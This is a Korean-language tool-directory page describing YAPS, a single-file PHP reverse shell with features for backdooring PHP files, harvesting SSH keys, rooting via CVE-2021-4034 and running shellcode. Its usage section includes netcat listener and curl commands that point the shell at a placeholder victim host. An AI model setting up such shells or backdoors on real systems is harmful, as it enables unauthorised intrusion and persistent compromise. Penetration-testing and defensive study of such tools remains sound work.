Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
YAPS — 또 다른 PHP 셸 - 가장 완벽한 PHP 리버스 셸 | Kitploit
도구/GitHubGitHub/nickguitar/yaps
Privilege EscalationPayload GenerationVulnerability AnalysisExploitationShellcodeInformation GatheringPost-ExploitationPenetration TestingCommand and ControlRemote Access Tool
GitHubnickguitar/yaps
8494년 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

YAPS

또 다른 PHP 셸 - 가장 완벽한 PHP 리버스 셸

저장소 보기

YAPS - Yet Another PHP Shell

image

네, 이름에서 알 수 있듯이 이것은 또 다른 PHP 리버스 셸입니다. 수백 개 중 하나이지만 몇 가지 장점이 있습니다. 단일 PHP 파일로 모든 기능을 포함하고 있으며, 간단한 TCP 리스너(예: nc -lp 1337)로 제어할 수 있습니다.

현재 버전(1.5)에서 주요 기능은 리눅스 시스템만 지원하지만, 윈도우에서도 작동하도록 만들 계획입니다.

현재 첫 번째 버전이며 아직 많이 테스트하지 않았고, 다음 버전을 위해 계획하고 개선할 사항이 많이 남아 있습니다 (아직 완료되지 않았습니다!), 그러니 버그를 발견하거나 기능이나 개선에 대한 제안이 있으면 알려주세요. =)

기능

  • 단일 PHP 파일 (패키지, 라이브러리 설치 또는 수많은 파일 다운로드 불필요)
  • netcat, ncat, socat, multi/handler 등 거의 모든 리스너와 호환
  • 사용자 정의 가능한 비밀번호 보호
  • .bash_history에 로그 기록 안 함
  • 일부 정보 수집 수행
    • 네트워크 정보 (인터페이스, iptables 규칙, 활성 포트)
    • 사용자 정보
    • SUID 및 GUID 파일 목록
    • SSH 키 검색 (공개 및 개인)
    • crontab 목록
    • 쓰기 가능한 PHP 파일 목록
  • LinPEAS, LinEnum 또는 Linux Exploit Suggester 자동 다운로드
  • 원격 호스트에서 PHP 코드 작성 및 실행
  • 대화형 리버스 셸 생성
  • 원하는 만큼 연결 복제
  • 자동 업데이트
  • 백도어로 PHP 파일 감염
  • pwnkit(CVE-2021-4034)을 통한 루트 리버스 셸 자동 획득
  • [신규] 셸코드 전송 및 실행

단점

  • 연결이 암호화되지 않음 (아직) (nc는 SSL 미지원)
  • 완전한 대화형이 아님 (!interactive로 대화형 셸 생성 가능)
    • CTRL+C로 중단됨; 화살표 키로 탐색 불가 (단, rlwrap nc -lp <ip> <port> 사용 시 가능)

사용법

  1. TCP 리스너 설정;
  2. IP와 포트 설정. 다음 방법으로 가능:
  • 2.1 스크립트 시작 부분의 변수 편집;
  • 2.2 POST 요청으로 설정 (curl -x POST -d "x=ip:port" victim.com/yaps.php);
  1. 브라우저에서 yaps.php 열기, curl 사용 또는 CLI로 실행;
  • 3.1 yaps.php?s 또는 yaps.php?silent로 배너 숨기기 가능
  • 3.2 CLI로 php yaps.php ip port 실행 가능
  1. 해킹!

작동 명령어

  • !help - 도움말 메뉴 표시
  • !all-colors - 모든 색상 전환 (무색 TTY 호환)
  • !color - PS1 색상 전환 (로컬 전용, 환경 변수 변경 없음)
  • !duplicate - 다른 YAPS 연결 생성
  • !enum - LinPEAS와 LinEnum을 /tmp에 다운로드하고 사용 준비
  • !info - 대상 정보 목록 (위에서 언급한 정보 수집)
  • !infect - 쓰기 가능한 PHP 파일을 백도어로 감염
  • !interactive - 다른 포트에서 대화형 리버스 셸 생성 (sudo, su, mysql 등과 함께 작동)
  • !passwd - 비밀번호 옵션 (활성화, 비활성화, 설정, 수정)
  • !php - 원격 호스트에서 PHP 작성 및 실행
  • !pwnkit - CVE-2021-4034를 악용하여 루트 리버스 셸 생성 시도
  • !shellcode - 원격 호스트에 셸코드 전송 및 실행

스크린샷

스크린샷 섹션 펼치기

현재 명령어:

commands

정보 수집 중:

image

CVE-2021-4034를 통한 루트 리버스 셸

pwn

셸코드 전송 및 실행!

shellcode

대화형 셸 생성

interactive

YAPS 세션 복제

duplicate

PHP 파일 오염

변경 로그

v1.5 - 2022-02-12

  • !shellcode 추가: 임의의 셸코드 수신 및 실행
  • duplicate() 함수 개선 (이제 포트 범위 지정 가능)
  • 함수 이름 stabilize에서 interactive로 변경
  • 내장 코드 압축하여 공간 절약
  • 깨진 링크 수정
  • 모든 명령어에 "TERM=xterm" 접두어 추가
  • 사소한 개선

v1.4 - 2022-02-04

  • !pwnkit 추가: CVE-2021-4034 악용하여 루트 리버스 셸 생성
  • verify_update() 함수 개선
  • 사소한 개선

v1.3.1 - 2021-08-01

  • 버그 수정

v1.3 - 2021-07-28

  • !infect 추가: PHP 파일에 백도어 감염
  • !stabilize 페이로드 변경 (버그 수정)

v1.2.2 - 2021-07-18

  • 'update' 함수 변경
  • 'connect' 함수 변경
  • 'download' 함수 개선
  • 버그 수정

v1.2.1 - 2021-07-17

  • 버그 수정

v1.2 - 2021-07-17

  • !duplicate 추가: 다른 셸 생성
  • 업데이트 확인 추가 (--update|-u)
  • CLI 인수 추가 (--help|-h)
  • 인수를 통한 소켓 추가 (php yaps.php ip port)
  • 셸 안정화 방법 변경 (더 이상 멈추지 않음)
  • 다운로드 방법 변경
  • POST를 통한 연결 방법 변경 (단일 매개변수 수신)

v1.1 - 2021-07-12

  • !all-colors 추가: 터미널 색상 전환 (무색 TTY에서 작동)
  • exit 명령어 추가: 소켓 닫기 (셸 종료)
  • !stabilize의 페이로드 변경: HISTSIZE 및 HISTFILE 설정 해제
  • !info에서 CPU 및 메모리 정보 획득 방법 변경

v1.0.1 - 2021-07-08

  • [x,y,z]를 array(x,y,z)로 변경: 이전 PHP 버전과의 호환성 개선
  • 대화형 셸 페이로드 변경: PHP<5.4에서 작동

크레딧

일부 아이디어는 다음 도구에서 영감을 받았습니다:

Linpeas

https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS

Linenum

https://github.com/rebootuser/LinEnum

Suggester

https://github.com/AonCyberLabs/Windows-Exploit-Suggester

Pentest Monkey

https://github.com/pentestmonkey/php-reverse-shell

Arthepsy exploit for pwnkit

https://github.com/arthepsy/CVE-2021-4034/

도구 다운로드
  • !suggester - Linux Exploit Suggester를 /tmp에 다운로드하고 사용 준비
  • infect

    원격 PHP 코드 작성

    remotephp

    비밀번호 보호 셸

    passprotected